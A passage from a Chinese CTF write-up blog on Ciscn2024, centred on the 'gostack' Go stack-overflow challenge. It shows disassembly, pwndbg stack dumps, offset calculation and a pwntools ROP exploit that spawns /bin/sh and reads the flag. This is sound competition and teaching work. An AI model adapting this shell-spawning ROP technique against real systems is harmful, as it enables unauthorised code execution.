:%s\n\&quot;</span>, missing CPU supp<span class="string">&quot;,</span></span><br><span class="line"><span class="string">    23,</span></span><br><span class="line"><span class="string">    (unsigned int)&amp;v37,</span></span><br><span class="line"><span class="string">    1,</span></span><br><span class="line"><span class="string">    1,</span></span><br><span class="line"><span class="string">    v28,</span></span><br><span class="line"><span class="string">    v29);</span></span><br><span class="line"><span class="string">  return 0LL;</span></span><br><span class="line"><span class="string">&#125;</span></span><br></pre></td></tr></table></figure>
<p>作为一个新人，我敢保证我眼睛看瞎了也看不懂这玩意儿，因此，先 gdb 一下再说，在那之前，先下断点，</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">.text:<span class="number">00000000004</span>A0974                 movups  [<span class="type">rsp</span>+<span class="number">208</span><span class="type">h</span>+<span class="type">var_B0</span>], xmm15</span><br><span class="line">.text:<span class="number">00000000004</span>A097D                 lea     rdx, RTYPE_string</span><br><span class="line">.text:<span class="number">00000000004</span>A0984                 mov     qword ptr [<span class="type">rsp</span>+<span class="number">208</span><span class="type">h</span>+<span class="type">var_B0</span>], rdx</span><br><span class="line">.text:<span class="number">00000000004</span>A098C                 lea     r10, off_4DF040 ; <span class="string">&quot;Input your magic message :\nSIG&quot;</span></span><br><span class="line">.text:<span class="number">00000000004</span>A0993                 mov     qword ptr [<span class="type">rsp</span>+<span class="number">208</span><span class="type">h</span>+<span class="type">var_B0</span>+<span class="number">8</span>], r10</span><br><span class="line">.text:<span class="number">00000000004</span>A099B                 mov     rbx, cs:qword_5633E8</span><br><span class="line">.text:<span class="number">00000000004</span>A09A2                 lea     rax, off_4DF508</span><br><span class="line">.text:<span class="number">00000000004</span>A09A9                 lea     rcx, aS_2       ; <span class="string">&quot;%s&quot;</span></span><br><span class="line">.text:<span class="number">00000000004</span>A09B0                 mov     edi, <span class="number">2</span></span><br><span class="line">.text:<span class="number">00000000004</span>A09B5                 lea     rsi, [<span class="type">rsp</span>+<span class="number">208</span><span class="type">h</span>+<span class="type">var_B0</span>]</span><br><span class="line">.text:<span class="number">00000000004</span>A09BD                 mov     r8d, <span class="number">1</span></span><br><span class="line">.text:<span class="number">00000000004</span>A09C3                 mov     r9, r8</span><br><span class="line">.text:<span class="number">00000000004</span>A09C6                 call    fmt_Fprintf</span><br><span class="line">.text:<span class="number">00000000004</span>A09CB                 lea     rax, [<span class="type">rsp</span>+<span class="number">208</span><span class="type">h</span>+<span class="type">var_88</span>]</span><br><span class="line">.text:<span class="number">00000000004</span>A09D3                 call    bufio__ptr_Scanner_Scan</span><br></pre></td></tr></table></figure>
<p>这里找到了需要下断点的大概的地址，就是最后这一行的这里是输入的函数，下断点之后，再继续进行调试，之后就发现了一点奇怪的东西，就是这儿：</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">02</span>:<span class="number">0010</span>│<span class="literal">-1f8</span> <span class="number">0</span>xc000044d68 —▸ <span class="number">0</span>xc0000b2000 ◂— <span class="string">&#x27;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n&#x27;</span></span><br></pre></td></tr></table></figure>
<p>栈的上下都没有写入的 AAA…，但是这个题目又叫栈溢出，就很耐人寻味是为啥，不过，懒得考虑那么多了，再继续 gdb 走起，之后就发现了，AAA 被逐渐逐渐地写入到了栈上：</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">00</span>:<span class="number">0000</span>│ rsp   <span class="number">0</span>xc000049d60 ◂— <span class="number">0</span>x0</span><br><span class="line"><span class="number">01</span>:<span class="number">0008</span>│<span class="literal">-1f8</span>   <span class="number">0</span>xc000049d68 —▸ <span class="number">0</span>xc000102000 ◂— <span class="string">&#x27;aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\n&#x27;</span></span><br><span class="line"><span class="number">02</span>:<span class="number">0010</span>│<span class="literal">-1f0</span>   <span class="number">0</span>xc000049d70 ◂— <span class="number">0</span>x24 /* <span class="string">&#x27;$&#x27;</span> */</span><br><span class="line"><span class="number">03</span>:<span class="number">0018</span>│<span class="literal">-1e8</span>   <span class="number">0</span>xc000049d78 ◂— <span class="number">0</span>x2</span><br><span class="line"><span class="number">04</span>:<span class="number">0020</span>│<span class="literal">-1e0</span>   <span class="number">0</span>xc000049d80 —▸ <span class="number">0</span>xc000049eb8 —▸ <span class="number">0</span>x4aa800 ◂— <span class="number">0</span>x10</span><br><span class="line"><span class="number">05</span>:<span class="number">0028</span>│<span class="literal">-1d8</span>   <span class="number">0</span>xc000049d88 ◂— <span class="number">0</span>x1</span><br><span class="line"><span class="number">06</span>:<span class="number">0030</span>│<span class="literal">-1d0</span>   <span class="number">0</span>xc000049d90 ◂— <span class="number">0</span>x1</span><br><span class="line"><span class="number">07</span>:<span class="number">0038</span>│ rdx<span class="literal">-7</span> <span class="number">0</span>xc000049d98 ◂— <span class="number">0</span>x61616161616161 /* <span class="string">&#x27;aaaaaaa&#x27;</span> */ &lt;<span class="literal">----</span>这里可以看到被写入了栈上</span><br></pre></td></tr></table></figure>
<p>然后查看栈空间的布局：</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">07</span>:<span class="number">0038</span>│ rdx<span class="literal">-7</span> <span class="number">0</span>xc000049d98 ◂— <span class="number">0</span>x61616161616161 /* <span class="string">&#x27;aaaaaaa&#x27;</span> */</span><br><span class="line"><span class="number">08</span>:<span class="number">0040</span>│<span class="literal">-1c0</span>   <span class="number">0</span>xc000049da0 ◂— <span class="number">0</span>x0</span><br><span class="line">... ↓          <span class="number">30</span> skipped</span><br><span class="line"><span class="number">27</span>:<span class="number">0138</span>│<span class="literal">-0c8</span>   <span class="number">0</span>xc000049e98 —▸ <span class="number">0</span>xc000020090 ◂— <span class="string">&#x27;aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&#x27;</span></span><br><span class="line"><span class="number">28</span>:<span class="number">0140</span>│<span class="literal">-0c0</span>   <span class="number">0</span>xc000049ea0 ◂— <span class="number">0</span>x24 /* <span class="string">&#x27;$&#x27;</span> */</span><br><span class="line"><span class="number">29</span>:<span class="number">0148</span>│<span class="literal">-0b8</span>   <span class="number">0</span>xc000049ea8 —▸ <span class="number">0</span>x49136a ◂— mov <span class="built_in">rbp</span>, qword ptr [<span class="type">rsp</span> + <span class="number">0</span><span class="type">x18</span>]</span><br><span class="line"><span class="number">2</span>a:<span class="number">0150</span>│<span class="literal">-0b0</span>   <span class="number">0</span>xc000049eb0 —▸ <span class="number">0</span>x549e80 (data_start+<span class="number">3296</span>) —▸ <span class="number">0</span>xc000100000 —▸ <span class="number">0</span>x4b9640 ◂— <span class="number">0</span>x8</span><br><span class="line"><span class="number">2</span>b:<span class="number">0158</span>│<span class="literal">-0a8</span>   <span class="number">0</span>xc000049eb8 —▸ <span class="number">0</span>x4aa800 ◂— <span class="number">0</span>x10</span><br><span class="line"><span class="number">2</span>c:<span class="number">0160</span>│<span class="literal">-0a0</span>   <span class="number">0</span>xc000049ec0 —▸ <span class="number">0</span>x4df040 —▸ <span class="number">0</span>x4c15af ◂— <span class="number">0</span>x6f79207475706e49 (<span class="string">&#x27;Input yo&#x27;</span>)</span><br><span class="line"><span class="number">2</span>d:<span class="number">0168</span>│<span class="literal">-098</span>   <span class="number">0</span>xc000049ec8 —▸ <span class="number">0</span>xc000049d98 ◂— <span class="number">0</span>x61616161616161 /* <span class="string">&#x27;aaaaaaa&#x27;</span> */</span><br><span class="line"><span class="number">2</span>e:<span class="number">0170</span>│<span class="literal">-090</span>   <span class="number">0</span>xc000049ed0 ◂— <span class="number">0</span>x100</span><br><span class="line"><span class="number">2</span>f:<span class="number">0178</span>│<span class="literal">-088</span>   <span class="number">0</span>xc000049ed8 ◂— <span class="number">0</span>x100</span><br><span class="line"><span class="number">30</span>:<span class="number">0180</span>│<span class="literal">-080</span>   <span class="number">0</span>xc000049ee0 —▸ <span class="number">0</span>x4df4e8 —▸ <span class="number">0</span>x4aeb40 ◂— <span class="number">0</span>x10</span><br><span class="line"><span class="number">31</span>:<span class="number">0188</span>│<span class="literal">-078</span>   <span class="number">0</span>xc000049ee8 —▸ <span class="number">0</span>xc000010010 —▸ <span class="number">0</span>xc00007e000 ◂— <span class="number">0</span>x0</span><br><span class="line"><span class="number">32</span>:<span class="number">0190</span>│<span class="literal">-070</span>   <span class="number">0</span>xc000049ef0 —▸ <span class="number">0</span>x4c5dd0 —▸ <span class="number">0</span>x49b080 ◂— cmp rsp, qword ptr [<span class="type">r14</span> + <span class="number">0</span><span class="type">x10</span>]</span><br><span class="line"><span class="number">33</span>:<span class="number">0198</span>│<span class="literal">-068</span>   <span class="number">0</span>xc000049ef8 ◂— <span class="number">0</span>x10000</span><br><span class="line"><span class="number">34</span>:<span class="number">01</span>a0│<span class="literal">-060</span>   <span class="number">0</span>xc000049f00 —▸ <span class="number">0</span>xc000102000 ◂— <span class="string">&#x27;aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\n&#x27;</span></span><br><span class="line"><span class="number">35</span>:<span class="number">01</span>a8│<span class="literal">-058</span>   <span class="number">0</span>xc000049f08 ◂— <span class="number">0</span>x24 /* <span class="string">&#x27;$&#x27;</span> */</span><br><span class="line"><span class="number">36</span>:<span class="number">01</span>b0│<span class="literal">-050</span>   <span class="number">0</span>xc000049f10 ◂— <span class="number">0</span>x1000</span><br><span class="line"><span class="number">37</span>:<span class="number">01</span>b8│<span class="literal">-048</span>   <span class="number">0</span>xc000049f18 —▸ <span class="number">0</span>xc000102000 ◂— <span class="string">&#x27;aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\n&#x27;</span></span><br><span class="line"><span class="number">38</span>:<span class="number">01</span>c0│<span class="literal">-040</span>   <span class="number">0</span>xc000049f20 ◂— <span class="number">0</span>x1000</span><br><span class="line"><span class="number">39</span>:<span class="number">01</span>c8│<span class="literal">-038</span>   <span class="number">0</span>xc000049f28 ◂— <span class="number">0</span>x1000</span><br><span class="line"><span class="number">3</span>a:<span class="number">01</span>d0│<span class="literal">-030</span>   <span class="number">0</span>xc000049f30 ◂— <span class="number">0</span>x25 /* <span class="string">&#x27;%&#x27;</span> */</span><br><span class="line"><span class="number">3</span>b:<span class="number">01</span>d8│<span class="literal">-028</span>   <span class="number">0</span>xc000049f38 ◂— <span class="number">0</span>x25 /* <span class="string">&#x27;%&#x27;</span> */</span><br><span class="line"><span class="number">3</span>c:<span class="number">01</span>e0│<span class="literal">-020</span>   <span class="number">0</span>xc000049f40 ◂— <span class="number">0</span>x0</span><br><span class="line">... ↓          <span class="number">2</span> skipped</span><br><span class="line"><span class="number">3</span>f:<span class="number">01</span>f8│<span class="literal">-008</span>   <span class="number">0</span>xc000049f58 ◂— <span class="number">0</span>x1</span><br><span class="line"><span class="number">40</span>:<span class="number">0200</span>│ <span class="built_in">rbp</span>   <span class="number">0</span>xc000049f60 —▸ <span class="number">0</span>xc000049f70 —▸ <span class="number">0</span>xc000049fd0 ◂— <span class="number">0</span>x0</span><br></pre></td></tr></table></figure>
<p>能清晰地看到，rbp 与缓冲区的大小：</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; distance <span class="number">0</span>xf60 <span class="number">0</span>xd98</span><br><span class="line"><span class="number">0</span>xf60-&gt;<span class="number">0</span>xd98 is <span class="literal">-0x1c8</span> bytes (<span class="literal">-0x39</span> words)</span><br></pre></td></tr></table></figure>
<p>那么，之后就可以直接进行栈溢出了。但是，在经过多次溢出之后，发现了个致命的问题，就是关于这个输入函数，致命在哪里呢？在这儿：</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">.text:<span class="number">000000000049</span>A786                 cmp     byte ptr [<span class="type">rax</span>+<span class="number">79</span><span class="type">h</span>], <span class="number">0</span></span><br><span class="line">.text:<span class="number">000000000049</span>A78A                 jnz     short loc_49A79A</span><br></pre></td></tr></table></figure>
<p>以及：</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">.text:<span class="number">000000000049</span>A79A loc_49A79A:                             ; CODE XREF: bufio__ptr_Scanner_Scan+<span class="number">2</span>A↑j</span><br><span class="line">.text:<span class="number">000000000049</span>A79A                 xor     eax, eax</span><br><span class="line">.text:<span class="number">000000000049</span>A79C                 mov     <span class="built_in">rbp</span>, [<span class="type">rsp</span>+<span class="number">0</span><span class="type">D0h</span>+<span class="type">var_8</span>]</span><br><span class="line">.text:<span class="number">000000000049</span>A7A4                 add     rsp, <span class="number">0</span>D0<span class="built_in">h</span></span><br><span class="line">.text:<span class="number">000000000049</span>A7AB                 retn</span><br></pre></td></tr></table></figure>
<p>它会对这儿进行一次比对，如果是 0，则不会跳转，如果不是 0，则会跳转，直接停止输入的函数。<br>
所以需要直接用 \x00 来填充是最保险的。之后就是 syscall 来打，但是 exp 我不是很会写，先借鉴借鉴大佬们的，之后再看看：</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line"><span class="comment"># context.log_level = &#x27;debug&#x27;</span></span><br><span class="line">io = <span class="keyword">process</span>(<span class="string">&#x27;./gostack&#x27;</span>)</span><br><span class="line"><span class="comment"># io = remote(&#x27;8.147.133.63&#x27;,  34196)</span></span><br><span class="line"></span><br><span class="line">io.recvuntil(b<span class="string">&#x27;magic message :&#x27;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">bss = <span class="number">0</span>x000000000563C50</span><br><span class="line">syscall_addr = <span class="number">0</span>x0000000000404043</span><br><span class="line">pop_rsi = <span class="number">0</span>x000000000042138a</span><br><span class="line">pop_rax = <span class="number">0</span>x000000000040f984</span><br><span class="line">pop_rdx = <span class="number">0</span>x00000000004944ec</span><br><span class="line">pop_rdi = <span class="number">0</span>x00000000004a18a5</span><br><span class="line">leave_ret = <span class="number">0</span>x000000000049695a</span><br><span class="line"></span><br><span class="line"><span class="comment"># write &#x27;/bin/sh\x00&#x27; to bss</span></span><br><span class="line">rop = p64(pop_rax)</span><br><span class="line">rop += p64(<span class="number">0</span>)</span><br><span class="line">rop += p64(pop_rsi)</span><br><span class="line">rop += p64(bss)</span><br><span class="line">rop += p64(pop_rdx)</span><br><span class="line">rop += p64(<span class="number">8</span>)</span><br><span class="line">rop += p64(pop_rdi)</span><br><span class="line">rop += p64(<span class="number">0</span>) </span><br><span class="line">rop += p64(syscall_addr)</span><br><span class="line">rop += p64(syscall_addr)</span><br><span class="line">rop += p64(syscall_addr)</span><br><span class="line">rop += p64(syscall_addr)</span><br><span class="line">rop += p64(syscall_addr)</span><br><span class="line">rop += p64(syscall_addr)</span><br><span class="line"></span><br><span class="line"><span class="comment"># execve(&#x27;/bin/sh&#x27;)</span></span><br><span class="line">rop += p64(pop_rax)</span><br><span class="line">rop += p64(<span class="number">0</span>x3b)</span><br><span class="line">rop += p64(pop_rsi)</span><br><span class="line">rop += p64(<span class="number">0</span>)</span><br><span class="line">rop += p64(pop_rdx)</span><br><span class="line">rop += p64(<span class="number">0</span>)</span><br><span class="line">rop += p64(pop_rdi)</span><br><span class="line">rop += p64(bss)</span><br><span class="line">rop += p64(syscall_addr)</span><br><span class="line">rop += p64(syscall_addr)</span><br><span class="line">rop += p64(syscall_addr)</span><br><span class="line">rop += p64(syscall_addr)</span><br><span class="line">rop += p64(syscall_addr)</span><br><span class="line">rop += p64(syscall_addr)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">payload = b<span class="string">&#x27;/bin/sh\x00&#x27;</span> + b<span class="string">&#x27;A&#x27;</span> * <span class="number">0</span>xf8</span><br><span class="line">payload += p64(<span class="number">0</span>xc00004dd98)</span><br><span class="line">payload += p64(<span class="number">0</span>x110)</span><br><span class="line">payload += p64(<span class="number">0</span>x110)</span><br><span class="line">payload += b<span class="string">&#x27;D&#x27;</span> * <span class="number">0</span>x60 + b<span class="string">&#x27;E&#x27;</span> * <span class="number">0</span>x50 + b<span class="string">&#x27;F&#x27;</span> *<span class="number">8</span> + rop</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># gdb.attach(io, gdbscript=&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="comment"># b *0x0000000004A0A88</span></span><br><span class="line"><span class="comment"># c</span></span><br><span class="line"><span class="comment"># stack 60</span></span><br><span class="line"><span class="comment">#     &#x27;&#x27;&#x27;)</span></span><br><span class="line"><span class="comment"># pause()</span></span><br><span class="line">io.sendline(payload)</span><br><span class="line"><span class="built_in">sleep</span>(<span class="number">0.6</span>)</span><br><span class="line">io.sendline(b<span class="string">&#x27;/bin/sh\x00&#x27;</span>)</span><br><span class="line"><span class="built_in">sleep</span>(<span class="number">0.6</span>)</span><br><span class="line">io.sendline(b<span class="string">&#x27;cat flag&#x27;</span>)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>
<h2 id="crypto"><a class="markdownIt-Anchor" href="#crypto">#</a> Crypto</h2>
<h3 id="古密"><a class="markdownIt-Anchor" href="#古密">#</a> 古密</h3>
<p><img data-src="https://img-blog.csdnimg.cn/img_convert/b613dd50168ba85408ec13bb18e31088.png" alt="image.png"><br>
<img data-src="https://img-blog.csdnimg.cn/img_convert/f08d9bb9ada5a3e235f039b29aca61af.png" alt="image.png"><br>
<img data-src="https://img-blog.csdnimg.cn/img_convert/39b72b7f9a576909c5c70e045b06bf68.png" alt="image.png"></p>

      <div class="tags">
          <a href="/tags/Game/" rel="tag"><i class="ic i-tag"></i> Game</a>
      </div>
  </div>

   <footer>

    <div class="meta">
  <span class="item">
    <span class="icon">
      <i class="ic i-calendar-check"></i>
    </span>
    <span class="text">更新于</span>
    <time title="修改时间：2024-06-20 22:16:46" itemprop="dateModified" datetime="2024-06-20T22:16:46+08:00">2024-06-20</time>
  </span>
</div>

      
<div class="reward">
  <button><i class="ic i-heartbeat"></i> 赞赏</button>
  <p>请我喝[茶]~(￣▽￣)~*</p>
  <div id="qr">
      
      <div>
        <img data-src="/images/wechatpay.png" alt="g01den 微信支付">
        <p>微信支付</p>
      </div>
      
      <div>
        <img data-src="/images/alipay.png" alt="g01den 支付宝">
        <p>支付宝</p>
      </div>
      
      <div>
        <img data-src="/images/paypal.png" alt="g01den 贝宝">
        <p>贝宝</p>
      </div>
  </div>
</div>

      

<div id="copyright">
<ul>
  <li class="author">
    <strong>本文作者： </strong>g01den <i class="ic i-at"><em>@</em></i>golden的部落阁
  </li>
  <li class="link">
    <strong>本文链接：</strong>
    <a href="http://blog.g01den.top/posts/9dd9bec.html" title="Ciscn2024">http://blog.g01den.top/posts/9dd9bec.html</a>
  </li>
  <li class="license">
    <strong>版权声明： </strong>本站所有文章除特别声明外，均采用 <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC96aC1DTg=="><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</span> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

  </footer>

</article>

  </div>
  

<div class="post-nav">
    <div class="item left">
      

  <a href="/posts/955175a5.html" itemprop="url" rel="prev" data-background-image="https:&#x2F;&#x2F;gitee.com&#x2F;gou-dengyue&#x2F;images&#x2F;raw&#x2F;master&#x2F;picture13.jpg" title="【2024】H&amp;NCTF">
  <span class="type">上一篇</span>
  <span class="category"><i class="ic i-flag"></i> CTFer的比赛之路</span>
  <h3>【2024】H&NCTF</h3>
  </a>

    </div>
    <div class="item right">
      

  <a href="/posts/7232a36b.html" itemprop="url" rel="next" data-background-image="https:&#x2F;&#x2F;s2.loli.net&#x2F;2024&#x2F;06&#x2F;12&#x2F;Bd7ZUqOiryI9jX5.jpg" title="小小的总结（日常发癫）">
  <span class="type">下一篇</span>
  <span class="category"><i class="ic i-flag"></i> 发电日常</span>
  <h3>小小的总结（日常发癫）</h3>
  </a>

    </div>
</div>

  
  <div class="wrap" id="comments"></div>


        </div>
        <div id="sidebar">
          

<div class="inner">

  <div class="panels">
    <div class="inner">
      <div class="contents panel pjax" data-title="文章目录">
          <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#web"><span class="toc-number">1.</span> <span class="toc-text"> Web</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#simple_php"><span class="toc-number">1.1.</span> <span class="toc-text"> Simple_php</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#re"><span class="toc-number">2.</span> <span class="toc-text"> Re</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#asm_re"><span class="toc-number">2.1.</span> <span class="toc-text"> asm_re</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#pwn"><span class="toc-number">3.</span> <span class="toc-text"> Pwn</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#gostack%E5%A4%8D%E7%8E%B0"><span class="toc-number">3.1.</span> <span class="toc-text"> gostack（复现）:</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#crypto"><span class="toc-number">4.</span> <span class="toc-text"> Crypto</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8F%A4%E5%AF%86"><span class="toc-number">4.1.</span> <span class="toc-text"> 古密</span></a></li></ol></li></ol>
      </div>
      <div class="related panel pjax" data-title="系列文章">
        <ul>
          <li><a href="/posts/fe4eec6d.html" rel="bookmark" title="【2024】高校网络安全管理运维赛">【2024】高校网络安全管理运维赛</a></li><li><a href="/posts/955175a5.html" rel="bookmark" title="【2024】H&NCTF">【2024】H&NCTF</a></li><li class="active"><a href="/posts/9dd9bec.html" rel="bookmark" title="Ciscn2024">Ciscn2024</a></li><li><a href="/posts/a929fb97.html" rel="bookmark" title="【2023】LitCTF">【2023】LitCTF</a></li><li><a href="/posts/4bf5e0ee.html" rel="bookmark" title="【2024】LitCTF">【2024】LitCTF</a></li><li><a href="/posts/c2860616.html" rel="bookmark" title="网鼎杯2024青龙组官方资格赛wp">网鼎杯2024青龙组官方资格赛wp</a></li><li><a href="/posts/666fe8df.html" rel="bookmark" title="【2024】强网杯">【2024】强网杯</a></li><li><a href="/posts/de34fe7b.html" rel="bookmark" title="【2024】HECTF-个人整理向">【2024】HECTF-个人整理向</a></li>
        </ul>
      </div>
      <div class="overview panel" data-title="站点概览">
        <div class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <img class="image" itemprop="image" alt="g01den"
      data-src="/images/avatar.jpg">
  <p class="name" itemprop="name">g01den</p>
  <div class="description" itemprop="description">golden的部落阁</div>
</div>

<nav class="state">
    <div class="item posts">
      <a href="/archives/">
        <span class="count">49</span>
        <span class="name">文章</span>
      </a>
    </div>
    <div class="item categories">
      <a href="/categories/">
        <span class="count">10</span>
        <span class="name">分类</span>
      </a>
    </div>
    <div class="item tags">
      <a href="/tags/">
        <span class="count">8</span>
        <span class="name">标签</span>
      </a>
    </div>
</nav>

<div class="social">
      <span class="exturl item github" data-url="aHR0cHM6Ly9naXRodWIuY29tL2cwMWRlbjE=" title="https:&#x2F;&#x2F;github.com&#x2F;g01den1"><i class="ic i-github"></i></span>
</div>

<ul class="menu">
  
    
  <li class="item">
    <a href="/" rel="section"><i class="ic i-home"></i>首页</a>
  </li>

    
  <li class="item">
    <a href="/about/" rel="section"><i class="ic i-user"></i>关于</a>
  </li>

        
  <li class="item dropdown">
      <a href="javascript:void(0);"><i class="ic i-feather"></i>文章</a>
    <ul class="submenu">

        
  <li class="item">
    <a href="/archives/" rel="section"><i class="ic i-list-alt"></i>归档</a>
  </li>

        
  <li class="item">
    <a href="/categories/" rel="section"><i class="ic i-th"></i>分类</a>
  </li>

        
  <li class="item">
    <a href="/tags/" rel="section"><i class="ic i-tags"></i>标签</a>
  </li>

  </ul>
    
  <li class="item">
    <a href="/links/" rel="section"><i class="ic i-magic"></i>links</a>
  </li>


</ul>

      </div>
    </div>
  </div>

  <ul id="quick">
    <li class="prev pjax">
        <a href="/posts/955175a5.html" rel="prev" title="上一篇"><i class="ic i-chevron-left"></i></a>
    </li>
    <li class="up"><i class="ic i-arrow-up"></i></li>
    <li class="down"><i class="ic i-arrow-down"></i></li>
    <li class="next pjax">
        <a href="/posts/7232a36b.html" rel="next" title="下一篇"><i class="ic i-chevron-right"></i></a>
    </li>
    <li class="percent"></li>
  </ul>
</div>


        </div>
        <div class="dimmer"></div>
      </div>
    </main>
    <footer id="footer">
      <div class="inner">
        <div class="widgets">
          
<div class="rpost pjax">
  <h2>随机文章</h2>
  <ul>
      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/Daily/" title="分类于 发电日常">发电日常</a>
</div>

    <span><a href="/posts/e3418ca3.html" title="随机二次元图api相关">随机二次元图api相关</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/Pwn/" title="分类于 Pwn手的自我修养">Pwn手的自我修养</a>
</div>

    <span><a href="/posts/c3c1bd42.html" title="Pwn学习笔记（2）--ret_2_text_or_shellcode">Pwn学习笔记（2）--ret_2_text_or_shellcode</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/Pwn/" title="分类于 Pwn手的自我修养">Pwn手的自我修养</a>
</div>

    <span><a href="/posts/cbafa55d.html" title="pwn学习笔记（6）--堆基础概述">pwn学习笔记（6）--堆基础概述</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/Misc/" title="分类于 杂七杂八的知识点">杂七杂八的知识点</a>
</div>

    <span><a href="/posts/d63a55bd.html" title="BUUCTF-Misc-第一页(1-16)">BUUCTF-Misc-第一页(1-16)</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/Pwn/" title="分类于 Pwn手的自我修养">Pwn手的自我修养</a>
</div>

    <span><a href="/posts/9d5b1ce4.html" title="pwn学习笔记（8）-初识沙箱">pwn学习笔记（8）-初识沙箱</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/Web/" title="分类于 Web狗的自我安慰">Web狗的自我安慰</a>
</div>

    <span><a href="/posts/a4378bd0.html" title="【2025】LitCTF">【2025】LitCTF</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/Daily/" title="分类于 发电日常">发电日常</a>
</div>

    <span><a href="/posts/cf99ed43.html" title="从NSSCTF开始的复建之路">从NSSCTF开始的复建之路</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/Web/" title="分类于 Web狗的自我安慰">Web狗的自我安慰</a>
</div>

    <span><a href="/posts/53e2b2e1.html" title="ctfshow-命令执行">ctfshow-命令执行</a></span>
  </li>

      
  <li class="item">
    
